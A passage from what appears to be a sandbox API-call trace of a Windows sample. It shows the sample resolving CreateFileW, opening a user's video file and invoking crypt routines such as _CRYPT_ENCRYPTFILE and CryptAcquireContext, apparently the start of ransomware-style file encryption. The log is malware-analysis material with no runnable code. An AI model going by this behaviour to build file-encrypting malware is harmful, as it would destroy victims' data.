lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.216] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0097.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca2e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0097.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.217] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0097.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0097.218] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml\\vj4prqa2pjimduescam.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0097.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0097.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.220] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0097.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.222] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.222] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.222] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0097.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0097.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ec0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0097.225] CloseHandle (hObject=0x258) returned 1 [0097.225] FreeLibrary (hLibModule=0x772d0000) returned 1 [0097.225] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0097.225] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\vJ4PRQa2pJimDueSCaM.mkv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83dcebb0, ftCreationTime.dwHighDateTime=0x1d5e857, ftLastAccessTime.dwLowDateTime=0xef491730, ftLastAccessTime.dwHighDateTime=0x1d5e540, ftLastWriteTime.dwLowDateTime=0xef491730, ftLastWriteTime.dwHighDateTime=0x1d5e540, nFileSizeHigh=0x0, nFileSizeLow=0x4bf9, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="vJ4PRQa2pJimDueSCaM.mkv", cAlternateFileName="VJ4PRQ~1.MKV")) returned 0x41ac600 [0097.225] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0097.226] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.226] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0097.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0097.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 